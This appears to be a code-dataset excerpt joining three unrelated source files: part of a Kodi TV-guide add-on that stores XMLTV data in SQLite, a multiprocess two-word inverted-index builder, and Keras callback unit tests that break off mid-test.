'CREATE TABLE channels(id TEXT, title TEXT, logo TEXT, stream_url TEXT, source TEXT, visible BOOLEAN, weight INTEGER, PRIMARY KEY (id, source), FOREIGN KEY(source) REFERENCES sources(id) ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED)')
c.execute(
'CREATE TABLE programs(channel TEXT, title TEXT, start_date TIMESTAMP, end_date TIMESTAMP, description TEXT, image_large TEXT, image_small TEXT, source TEXT, updates_id INTEGER, FOREIGN KEY(channel, source) REFERENCES channels(id, source) ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, FOREIGN KEY(updates_id) REFERENCES updates(id) ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED)')
c.execute('CREATE INDEX program_list_idx ON programs(source, channel, start_date, end_date)')
c.execute('CREATE INDEX start_date_idx ON programs(start_date)')
c.execute('CREATE INDEX end_date_idx ON programs(end_date)')
# make sure we have a record in sources for this Source
c.execute("INSERT OR IGNORE INTO sources(id, channels_updated) VALUES(?, ?)", [self.source.KEY, 0])
self.conn.commit()
c.close()
except sqlite3.OperationalError, ex:
raise DatabaseSchemaException(ex)
def addNotification(self, program):
self._invokeAndBlockForResult(self._addNotification, program)
# no result, but block until operation is done
def _addNotification(self, program):
"""
@type program: source.program
"""
c = self.conn.cursor()
c.execute("INSERT INTO notifications(channel, program_title, source) VALUES(?, ?, ?)",
[program.channel.id, program.title, self.source.KEY])
self.conn.commit()
c.close()
def removeNotification(self, program):
self._invokeAndBlockForResult(self._removeNotification, program)
# no result, but block until operation is done
def _removeNotification(self, program):
"""
@type program: source.program
"""
c = self.conn.cursor()
c.execute("DELETE FROM notifications WHERE channel=? AND program_title=? AND source=?",
[program.channel.id, program.title, self.source.KEY])
self.conn.commit()
c.close()
def getNotifications(self, daysLimit=2):
return self._invokeAndBlockForResult(self._getNotifications, daysLimit)
def _getNotifications(self, daysLimit):
start = datetime.datetime.now()
end = start + datetime.timedelta(days=daysLimit)
c = self.conn.cursor()
c.execute(
"SELECT DISTINCT c.title, p.title, p.start_date FROM notifications n, channels c, programs p WHERE n.channel = c.id AND p.channel = c.id AND n.program_title = p.title AND n.source=? AND p.start_date >= ? AND p.end_date <= ?",
[self.source.KEY, start, end])
programs = c.fetchall()
c.close()
return programs
def isNotificationRequiredForProgram(self, program):
return self._invokeAndBlockForResult(self._isNotificationRequiredForProgram, program)
def _isNotificationRequiredForProgram(self, program):
"""
@type program: source.program
"""
c = self.conn.cursor()
c.execute("SELECT 1 FROM notifications WHERE channel=? AND program_title=? AND source=?",
[program.channel.id, program.title, self.source.KEY])
result = c.fetchone()
c.close()
return result
def clearAllNotifications(self):
self._invokeAndBlockForResult(self._clearAllNotifications)
# no result, but block until operation is done
def _clearAllNotifications(self):
c = self.conn.cursor()
c.execute('DELETE FROM notifications')
self.conn.commit()
c.close()
class Source(object):
def getDataFromExternal(self, date, progress_callback=None):
"""
Retrieve data from external as a list or iterable. Data may contain both Channel and Program objects.
The source may choose to ignore the date parameter and return all data available.
@param date: the date to retrieve the data for
@param progress_callback:
@return:
"""
return None
def isUpdated(self, channelsLastUpdated, programsLastUpdated):
today = datetime.datetime.now()
if channelsLastUpdated is None or channelsLastUpdated.day != today.day:
return True
if programsLastUpdated is None or programsLastUpdated.day != today.day:
return True
return False
class XMLTVSource(Source):
PLUGIN_DATA = xbmc.translatePath(os.path.join('special://profile', 'addon_data', 'script.ftvguide'))
KEY = 'xmltv'
INI_TYPE_FTV = 0
INI_TYPE_CUSTOM = 1
INI_FILE = 'addons.ini'
LOGO_SOURCE_FTV = 0
LOGO_SOURCE_CUSTOM = 1
def __init__(self, addon):
gType = GuideTypes()
self.needReset = False
self.fetchError = False
self.xmltvType = int(addon.getSetting('xmltv.type'))
self.xmltvInterval = int(addon.getSetting('xmltv.interval'))
self.logoSource = int(addon.getSetting('logos.source'))
self.addonsType = int(addon.getSetting('addons.ini.type'))
# make sure the folder in the user's profile exists or create it!
if not os.path.exists(XMLTVSource.PLUGIN_DATA):
os.makedirs(XMLTVSource.PLUGIN_DATA)
if self.logoSource == XMLTVSource.LOGO_SOURCE_FTV:
self.logoFolder = MAIN_URL + 'logos/'
else:
self.logoFolder = str(addon.getSetting('logos.folder'))
if self.xmltvType == gType.CUSTOM_FILE_ID:
self.xmltvFile = str(addon.getSetting('xmltv.file')) # uses local file provided by user!
else:
self.xmltvFile = self.updateLocalFile(gType.getGuideDataItem(self.xmltvType, gType.GUIDE_FILE), addon)
# make sure the ini file is fetched as well if necessary
if self.addonsType == XMLTVSource.INI_TYPE_FTV:
self.updateLocalFile(XMLTVSource.INI_FILE, addon)
if not self.xmltvFile or not xbmcvfs.exists(self.xmltvFile):
raise SourceNotConfiguredException()
def updateLocalFile(self, name, addon):
path = os.path.join(XMLTVSource.PLUGIN_DATA, name)
fetcher = FileFetcher(name, addon)
retVal = fetcher.fetchFile()
if retVal == fetcher.FETCH_OK and name <> XMLTVSource.INI_FILE:
self.needReset = True
elif retVal == fetcher.FETCH_ERROR:
xbmcgui.Dialog().ok(strings(FETCH_ERROR_TITLE), strings(FETCH_ERROR_LINE1), strings(FETCH_ERROR_LINE2))
return path
def getDataFromExternal(self, date, progress_callback=None):
f = FileWrapper(self.xmltvFile)
context = ElementTree.iterparse(f, events=("start", "end"))
size = f.size
return self.parseXMLTV(context, f, size, self.logoFolder, progress_callback)
def isUpdated(self, channelsLastUpdated, programLastUpdate):
if channelsLastUpdated is None or not xbmcvfs.exists(self.xmltvFile):
return True
stat = xbmcvfs.Stat(self.xmltvFile)
fileUpdated = datetime.datetime.fromtimestamp(stat.st_mtime())
return fileUpdated > channelsLastUpdated
def parseXMLTVDate(self, origDateString):
if origDateString.find(' ') != -1:
# get timezone information
dateParts = origDateString.split()
if len(dateParts) == 2:
dateString = dateParts[0]
offset = dateParts[1]
if len(offset) == 5:
offSign = offset[0]
offHrs = int(offset[1:3])
offMins = int(offset[-2:])
td = datetime.timedelta(minutes=offMins, hours=offHrs)
else:
td = datetime.timedelta(seconds=0)
elif len(dateParts) == 1:
dateString = dateParts[0]
td = datetime.timedelta(seconds=0)
else:
return None
# normalize the given time to UTC by applying the timedelta provided in the timestamp
xbmc.log('[script.ftvguide] Date to normalize: ' + dateString, xbmc.LOGDEBUG)
try:
t_tmp = datetime.datetime.strptime(dateString, '%Y%m%d%H%M%S')
except TypeError:
t_tmp = datetime.datetime.fromtimestamp(time.mktime(time.strptime(dateString, '%Y%m%d%H%M%S')))
if offSign == '+':
t = t_tmp - td
elif offSign == '-':
t = t_tmp + td
else:
t = t_tmp
# get the local timezone offset in seconds
is_dst = time.daylight and time.localtime().tm_isdst > 0
utc_offset = - (time.altzone if is_dst else time.timezone)
td_local = datetime.timedelta(seconds=utc_offset)
t = t + td_local
xbmc.log('[script.ftvguide] Import Time adjusted from: ' + str(t_tmp) + ' to: ' + str(t), xbmc.LOGDEBUG)
return t
else:
return None
def parseXMLTV(self, context, f, size, logoFolder, progress_callback):
event, root = context.next()
elements_parsed = 0
for event, elem in context:
if event == "end":
result = None
if elem.tag == "programme":
channel = elem.get("channel")
description = elem.findtext("desc")
iconElement = elem.find("icon")
icon = None
if iconElement is not None:
icon = iconElement.get("src")
if not description:
description = strings(NO_DESCRIPTION)
result = Program(channel, elem.findtext('title'), self.parseXMLTVDate(elem.get('start')),
self.parseXMLTVDate(elem.get('stop')), description, imageSmall=icon)
elif elem.tag == "channel":
id = elem.get("id")
title = elem.findtext("display-name")
logo = None
if logoFolder:
logoFile = os.path.join(logoFolder, title + '.png')
if (self.logoSource == XMLTVSource.LOGO_SOURCE_FTV):
logo = logoFile.replace(' ', '%20') # needed due to fetching from a server!
elif xbmcvfs.exists(logoFile):
logo = logoFile # local file instead of remote!
streamElement = elem.find("stream")
streamUrl = None
if streamElement is not None:
streamUrl = streamElement.text
visible = elem.get("visible")
if visible == "0":
visible = False
else:
visible = True
result = Channel(id, title, logo, streamUrl, visible)
if result:
elements_parsed += 1
if progress_callback and elements_parsed % 500 == 0:
if not progress_callback(100.0 / size * f.tell()):
raise SourceUpdateCanceledException()
yield result
root.clear()
f.close()
class FileWrapper(object):
def __init__(self, filename):
self.vfsfile = xbmcvfs.File(filename)
self.size = self.vfsfile.size()
self.bytesRead = 0
def close(self):
self.vfsfile.close()
def read(self, byteCount):
self.bytesRead += byteCount
return self.vfsfile.read(byteCount)
def tell(self):
return self.bytesRead
def instantiateSource():
return XMLTVSource(ADDON)
|
two_word_index.py | import os
from _queue import Empty
from multiprocessing import Queue, Event, Process, Pool
from threading import Thread
from sortedcontainers import SortedDict
from common.constants import PATH_TO_DICT, PATH_TO_RESULT_DIR, \
PATH_TO_LIST_OF_FILES, BYTE, PATH_TO_DATA_DIR
from common.exceptions import NotSupportedExtensionException
from dictionary.decoder import get_file_reader_by_extension
from dictionary.utils import get_list_of_files, write_doc_ids_to_file, \
write_dictionary_to_file, write_token_list_to_file, \
add_unfinished_part_from_prev_chunk, get_tokens_from_chunk
CHUNK_SIZE = 4 * BYTE
QUEUE_MAX_SIZE = 10000
QUEUE_MIN_SIZE = 10000
CHUNK_WORKERS_NUM = 6
TOKEN_WORKERS_NUM = 3
chunk_queue = Queue()
token_queue = Queue()
file_job_done = Event()
token_job_done = Queue(maxsize=CHUNK_WORKERS_NUM)
inverted_index = SortedDict()
lexicon = dict()
def retrieve_tokens(chunk_start, chunk) -> list:
"""
Receives chunk from the queue. Than replace punctuation with
spaces and retrieve tokens with their positions in text
return: file_id - docID of the material of origin,
tokens - list of tokens with positions in text
"""
tokens = get_tokens_from_chunk(chunk, chunk_start)
return tokens
def notify_on_finish() -> None:
"""Send an event that the worked has finished reading from queue"""
token_job_done.put(0)
print("Chunk process down")
def get_chunk_from_queue_and_process() -> bool:
"""
Get retrieved tokens from received chunk and puts them into the
queue
:return: True - waiting foe the next chunk, False - queue is closed
"""
try:
file_id, chunk_start, chunk = chunk_queue.get(block=True, timeout=1)
tokens = retrieve_tokens(chunk_start, chunk)
token_queue.put((file_id, tokens))
except Empty:
if file_job_done.is_set():
notify_on_finish()
return False
return True
def chunk_to_tokens_worker() -> None:
"""
While queue is not empty during timeout, read chunks from queue
and split it to tokens. Then put tokens into the queue and wait
for next chunk.
"""
while True:
if not get_chunk_from_queue_and_process():
return
def get_list_or_add_to_lists(file_id: int) -> dict:
if file_id not in lexicon:
lexicon[file_id] = SortedDict()
return lexicon[file_id]
def reduce_tokens_to_lexicon() -> None:
"""
Read parsed token with position in specified documents and map them
into token dictionary and inverted list of word positions
:return: token_dict - token dictionary,
word_position_lists - inverted list of token positions in documents
"""
def append_token_to_dict():
if two_word_token not in inverted_index:
inverted_index[two_word_token] = set()
inverted_index[two_word_token].add(file_id)
def append_token_to_list():
if token not in curr_word_position_list:
curr_word_position_list[token] = []
curr_word_position_list[token].append(position)
last_token = None
while True:
try:
file_id, tokens = token_queue.get(block=True, timeout=1)
curr_word_position_list = \
get_list_or_add_to_lists(file_id)
for position, token in tokens:
if last_token is not None:
two_word_token = f'{last_token} {token}'
append_token_to_dict()
append_token_to_list()
last_token = token
except Empty:
print("Failed to read from token queue")
if token_job_done.full():
print('Worker finished')
return
def read_document_and_put_into_queue(file_path: str, file_id: int) -> None:
"""
Read document chunk by chunk and put them into the queue
:param file_path: Path to document which will be read
:param file_id: generated docID of the document
"""
chunk_start = 0
unfinished_part = ''
with get_file_reader_by_extension(file_path) as file:
chunk = file.read_chunk()
while chunk:
actual_chunk, unfinished_part = \
add_unfinished_part_from_prev_chunk(chunk, unfinished_part)
chunk_queue.put((file_id, chunk_start, actual_chunk))
chunk = file.read_chunk()
chunk_start += len(actual_chunk) + 1
if unfinished_part:
chunk_queue.put((file_id, chunk_start, unfinished_part))
def read_document_and_put_tokens_to_queue(file_path, file_id) -> bool:
try:
read_document_and_put_into_queue(file_path, file_id)
except NotSupportedExtensionException as e:
print(e.message)
return False
return True
def process_documents() -> None:
"""
1. Discover file in the directory and give them a unique ID.
2. Read each file if it is a document and the extension is
supported by the parser. Put read parts into the queue to parse
text into the tokens.
3. Save document's IDs to file on disk
"""
documents_with_id = dict()
for file_id, file_name in get_list_of_files():
file_path = os.path.join(PATH_TO_DATA_DIR, file_name)
if not os.path.isfile(file_path):
continue
if read_document_and_put_tokens_to_queue(file_path, file_id):
documents_with_id[file_path] = file_id
file_job_done.set()
print('Documents are read')
write_doc_ids_to_file(documents_with_id, PATH_TO_LIST_OF_FILES)
def main() -> None:
"""
Algorithm:
1. Producer reads documents -> puts data into the queue ->
adds document to the dictionary <doc_id, file_name>
2. First-layer consumers read the data queue -> tokenize the text
-> put into reduce queue
3. Reducers merge tokens into local lexicons -> put mini lexicons
to reduce queue 2
4. Global reducer reduces mini lexicons to global lexicon and when
writes result into files.
"""
producer = Process(target=process_documents)
producer.start()
chunk_workers = Pool(CHUNK_WORKERS_NUM)
for _ in range(CHUNK_WORKERS_NUM):
chunk_workers.apply_async(chunk_to_tokens_worker)
threads = []
for _ in range(TOKEN_WORKERS_NUM):
t = Thread(target=reduce_tokens_to_lexicon)
threads.append(t)
t.start()
[t.join() for t in threads]
print('dictionary created')
write_lexicon_process = \
Process(target=write_dictionary_to_file,
args=(inverted_index, PATH_TO_DICT),
kwargs=dict(is_lexicon=True, lexicon=lexicon))
write_lexicon_process.start()
for file_id, word_position_list in lexicon.items():
path_to_result_file = \
os.path.join(PATH_TO_RESULT_DIR, str(file_id))
write_token_list_to_file(word_position_list, path_to_result_file)
|
callbacks_test.py | import os
import multiprocessing
import numpy as np
import pytest
from numpy.testing import assert_allclose
from csv import reader
from csv import Sniffer
import shutil
from collections import defaultdict
from keras import optimizers
from keras import initializers
from keras import callbacks
from keras.models import Sequential, Model
from keras.layers import Input, Dense, Dropout, add, dot, Lambda, Layer
from keras.layers import Conv2D
from keras.layers import MaxPooling2D
from keras.layers import GlobalAveragePooling1D
from keras.layers import GlobalAveragePooling2D
from keras.layers import BatchNormalization
from keras.utils.test_utils import get_test_data
from keras.utils.generic_utils import to_list
from keras.utils.generic_utils import unpack_singleton
from keras import backend as K
from keras.utils import np_utils
try:
from unittest.mock import patch
except ImportError:
from mock import patch
input_dim = 2
num_hidden = 4
num_classes = 2
batch_size = 5
train_samples = 20
test_samples = 20
def data_generator(x, y, batch_size):
x = to_list(x)
y = to_list(y)
max_batch_index = len(x[0]) // batch_size
i = 0
while 1:
x_batch = [array[i * batch_size: (i + 1) * batch_size] for array in x]
x_batch = unpack_singleton(x_batch)
y_batch = [array[i * batch_size: (i + 1) * batch_size] for array in y]
y_batch = unpack_singleton(y_batch)
yield x_batch, y_batch
i += 1
i = i % max_batch_index
# Changing the default arguments of get_test_data.
def get_data_callbacks(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes):
return get_test_data(num_train=num_train,
num_test=num_test,
input_shape=input_shape,
classification=classification,
num_classes=num_classes)
class Counter(callbacks.Callback):
"""Counts the number of times each callback method was run.
# Arguments
method_counts: dict, contains the counts of time
each callback method was run.
"""
def __init__(self):
self.method_counts = defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_train_batch_begin', 'on_train_batch_end',
'on_test_batch_begin', 'on_test_batch_end',
'on_predict_batch_begin', 'on_predict_batch_end',
'on_train_begin', 'on_train_end',
'on_predict_begin', 'on_predict_end',
'on_test_begin', 'on_test_end',
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(
method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
class TestCallbackCounts(object):
def _check_counts(self, counter, expected_counts):
"""Checks that counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
count = counter.method_counts[method_name]
assert count == expected_count, \
'For method {}: expected {}, got: {}'.format(
method_name, expected_count, count)
def _get_model(self):
layers = [
Dense(10, activation='relu', input_dim=input_dim),
Dense(num_classes, activation='softmax')
]
model = Sequential(layers=layers)
model.compile(optimizer='adam', loss='binary_crossentropy')
return model
def test_callback_hooks_are_called_in_fit(self):
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks(num_train=10,
num_test=4)
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
model = self._get_model()
counter = Counter()
model.fit(X_train, y_train, validation_data=(X_test, y_test),
batch_size=2, epochs=5, callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1,
})
def test_callback_hooks_are_called_in_evaluate(self):
np.random.seed(1337)
(_, _), (X_test, y_test) = get_data_callbacks(num_test=10)
y_test = np_utils.to_categorical(y_test)
model = self._get_model()
counter = Counter()
model.evaluate(X_test, y_test, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1,
'on_batch_begin': 0,
'on_batch_end': 0,
'on_epoch_begin': 0,
'on_epoch_end': 0,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_train_batch_begin': 0,
'on_train_batch_end': 0,
'on_train_begin': 0,
'on_train_end': 0,
})
def test_callback_hooks_are_called_in_predict(self):
np.random.seed(1337)
(_, _), (X_test, _) = get_data_callbacks(num_test=10)
model = self._get_model()
counter = Counter()
model.predict(X_test, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1,
'on_batch_begin': 0,
'on_batch_end': 0,
'on_epoch_begin': 0,
'on_epoch_end': 0,
'on_test_batch_begin': 0,
'on_test_batch_end': 0,
'on_test_begin': 0,
'on_test_end': 0,
'on_train_batch_begin': 0,
'on_train_batch_end': 0,
'on_train_begin': 0,
'on_train_end': 0,
})
def test_callback_hooks_are_called_in_fit_generator(self):
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks(num_train=10,
num_test=4)
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
train_generator = data_generator(X_train, y_train, batch_size=2)
validation_generator = data_generator(X_test, y_test, batch_size=2)
model = self._get_model()
counter = Counter()
model.fit_generator(train_generator,
steps_per_epoch=len(X_train) // 2,
epochs=5,
validation_data=validation_generator,
validation_steps=len(X_test) // 2,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1,
})
def test_callback_hooks_are_called_in_evaluate_generator(self):
np.random.seed(1337)
(_, _), (X_test, y_test) = get_data_callbacks(num_test=10)
y_test = np_utils.to_categorical(y_test)
model = self._get_model()
counter = Counter()
model.evaluate_generator(data_generator(X_test, y_test, batch_size=2),
steps=len(X_test) // 2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1,
'on_batch_begin': 0,
'on_batch_end': 0,
'on_epoch_begin': 0,
'on_epoch_end': 0,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_train_batch_begin': 0,
'on_train_batch_end': 0,
'on_train_begin': 0,
'on_train_end': 0,
})
def test_callback_hooks_are_called_in_predict_generator(self):
np.random.seed(1337)
(_, _), (X_test, _) = get_data_callbacks(num_test=10)
def data_generator(x, batch_size):
x = to_list(x)
max_batch_index = len(x[0]) // batch_size
i = 0
while 1:
x_batch = [
array[i * batch_size: (i + 1) * batch_size] for array in x]
x_batch = unpack_singleton(x_batch)
yield x_batch
i += 1
i = i % max_batch_index
model = self._get_model()
counter = Counter()
model.predict_generator(data_generator(X_test, batch_size=2),
steps=len(X_test) // 2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1,
'on_batch_begin': 0,
'on_batch_end': 0,
'on_epoch_begin': 0,
'on_epoch_end': 0,
'on_test_batch_begin': 0,
'on_test_batch_end': 0,
'on_test_begin': 0,
'on_test_end': 0,
'on_train_batch_begin': 0,
'on_train_batch_end': 0,
'on_train_begin': 0,
'on_train_end': 0,
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_batch_begin': 0,
'on_batch_end': 0,
'on_epoch_begin': 0,
'on_epoch_end': 0,
'on_test_begin': 0,
'on_test_end': 0,
'on_train_batch_begin': 0,
'on_train_batch_end': 0,
'on_train_begin': 0,
'on_train_end': 0,
})
def test_TerminateOnNaN():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN()]
model = Sequential()
initializer = initializers.Constant(value=1e5)
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu',
kernel_initializer=initializer))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
# case 1 fit
history = model.fit(X_train, y_train,
batch_size=batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf
history = model.fit_generator(data_generator(X_train, y_train, batch_size),
len(X_train),
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf or np.isnan(loss[0])
def test_stop_training_csv(tmpdir):
np.random.seed(1337)
fp = str(tmpdir / 'test.csv')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)]
model = Sequential()
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(X_train) // batch_size
tot = 0
while 1:
if tot > 3 * len(X_train):
yield (np.ones([batch_size, input_dim]) * np.nan,
np.ones([batch_size, num_classes]) * np.nan)
else:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
i += 1
tot += 1
i = i % max_batch_index
history = model.fit_generator(data_generator(),
len(X_train) // batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in reader(f):
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
os.remove(fp)
def test_ModelCheckpoint(tmpdir):
np.random.seed(1337)
filepath = str(tmpdir / 'checkpoint.h5')
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_accuracy'
cbks = [callbacks.ModelCheckpoint(filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = 'checkpoint.{epoch:02d}.h5'
cbks = [callbacks.ModelCheckpoint(filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=4)
assert os.path.isfile(filepath.format(epoch=2))
assert os.path.isfile(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not tmpdir.listdir()
def test_EarlyStopping():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_data_callbacks()
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience,
monitor=monitor,
mode=mode)]
history = model.fit(X_train, y_train,
batch_size=batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience,
monitor=monitor,
mode=mode)]
history = model.fit(X_train, y_train,
batch_size=batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
def test_EarlyStopping_reuse():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd',
loss='binary_crossentropy',
metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_patience():
class DummyModel(object):
def __init__(self):
self.stop_training = False
def get_weights(self):
return []
def set_weights(self, weights):
pass
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
early_stop.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040, 0.1019]
# Should stop after epoch 3,
# as the loss has not improved after patience=2 epochs.
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
assert epochs_trained == 3
def test_EarlyStopping_baseline():
class DummyModel(object):
def __init__(self):
self.stop_training = False
def get_weights(self):
return []
def set_weights(self, weights):
pass
def baseline_tester(acc_levels):
early_stop = callbacks.EarlyStopping(monitor='val_acc', baseline=0.75,
patience=2)
early_stop.model = DummyModel()
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(acc_levels)):
epochs_trained += 1
early_stop.on_epoch_end(epoch, logs={'val_acc': acc_levels[epoch]})
if early_stop.model.stop_training:
break
return epochs_trained
acc_levels = [0.55, 0.76, 0.81, 0.81]
baseline_met = baseline_tester(acc_levels)
acc_levels = [0.55, 0.74, 0.81, 0.81]
baseline_not_met = baseline_tester(acc_levels)
# All epochs should run because baseline was met in second epoch
assert baseline_met == 4
# Baseline was not met by second epoch and should stop
assert baseline_not_met == 2
def test_EarlyStopping_final_weights():
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in the epoch 2 (loss = 0.1000),
